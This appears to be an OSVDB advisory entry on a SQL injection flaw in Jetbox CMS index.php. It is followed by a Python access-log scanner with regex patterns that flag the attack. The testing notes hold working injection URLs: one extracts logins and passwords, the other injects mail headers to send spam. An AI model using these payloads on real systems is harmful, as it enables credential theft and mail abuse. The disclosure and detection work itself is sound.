Jetbox CMS index.php Multiple Variable SQL Injection

2007-05-21T00:00:00
ID OSVDB:34784
Type osvdb
Reporter OSVDB
Modified 2007-05-21T00:00:00

Description

Technical Description

This vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.

Manual Testing Notes

http://[target]/[PRODUCT-DIRECTORY]/index.php?view=-1' UNION SELECT 1,CONCAT(login,'-',user_password),1,1,1,1,1,1,1,1,1,1 FROM User LIMIT 0,1%23

http://[target]/[JETBOX-DIRECTORY]/index.php?view=webuser&task=sendpw&login=-1' UNION SELECT 1,1,1,'spam1mail.com%0ABcc: spam_address2@somedomain.com, spam_address2@somedomain.com, spam_address4@somedomain.com, spam_addressNsome@domain.com%0ASubject: Some Spam Subject%0AFrom: any_addresssome@domain.com%0AMIME-Version: 1.0%0AContent-Type: multipart/mixed; boundary=Hacker;%0A%0A--Hacker%0ASome Spam Message%0A%0AContent-Type:text/ html;name=any_file.html;%0AContent-Transfer-Encoding:8bit%0AContent-Disposition: attachment%0A%0AHTML File%0A%0A--Hacker- -%0AOther text will be hide',1 FROM user %23
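The two test requests above leave a recognizable trace in web server access logs. The following log check is an added example, not part of the original advisory; the combined-style log format, the /jetbox/ path, the addresses and the shortened sample payloads are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

WATCHED = ("view", "login")  # parameters the advisory's test requests inject through
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
# A quote that closes the string literal, followed by UNION SELECT.
UNION = re.compile(r"'\s*union\s+(?:all\s+)?select\b", re.I)
# A decoded line break followed by a mail header name (second test request).
MAIL_HEADER = re.compile(
    r"[\r\n]\s*(?:bcc|cc|to|from|subject|mime-version|content-type)\s*:", re.I)

def findings(log_line):
    """Return sorted findings for one access-log line, or [] if nothing matched."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    target = urlsplit(match.group(1))
    if not target.path.endswith("/index.php"):
        return []
    found = set()
    for pair in target.query.split("&"):
        raw_name, _, raw_value = pair.partition("=")
        name, value = unquote_plus(raw_name), unquote_plus(raw_value)
        if name not in WATCHED:
            continue
        if UNION.search(value):
            found.add(name + ":union-select")
        if MAIL_HEADER.search(value):
            found.add(name + ":mail-header")
    return sorted(found)

def scan(lines):
    """Return (line index, findings) for every line with at least one finding."""
    hits = [(i, findings(line)) for i, line in enumerate(lines)]
    return [(i, f) for i, f in hits if f]

# Constructed sample lines: hosts, path and payloads are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/May/2007:10:00:01 +0000] "GET /jetbox/index.php?view=news HTTP/1.1" 200 5120',
    '192.0.2.66 - - [21/May/2007:10:00:07 +0000] "GET /jetbox/index.php?view=-1%27%20UNION%20SELECT%201,CONCAT(login,%27-%27,user_password),1%20FROM%20User%20LIMIT%200,1%23 HTTP/1.1" 200 812',
    '192.0.2.66 - - [21/May/2007:10:00:09 +0000] "GET /jetbox/index.php?view=webuser&task=sendpw&login=-1%27%20UNION%20SELECT%201,1,1,%27a@example.com%0ABcc:%20b@example.com%27,1%20FROM%20user%20%23 HTTP/1.1" 200 640',
    '192.0.2.11 - - [21/May/2007:10:01:30 +0000] "GET /jetbox/index.php?view=webuser&task=sendpw&login=alice HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for index, found in scan(SAMPLE_LOG):
        print(index, found)
```

Access logs record only the request line, so the same parameters sent in a POST body need inspection at the application or a filtering proxy instead.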

References:

Other Advisory URL: http://www.netvigilance.com/advisory0028
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-05/0349.html
ISS X-Force ID: 34387
CVE-2007-2685
Bugtraq ID: 24077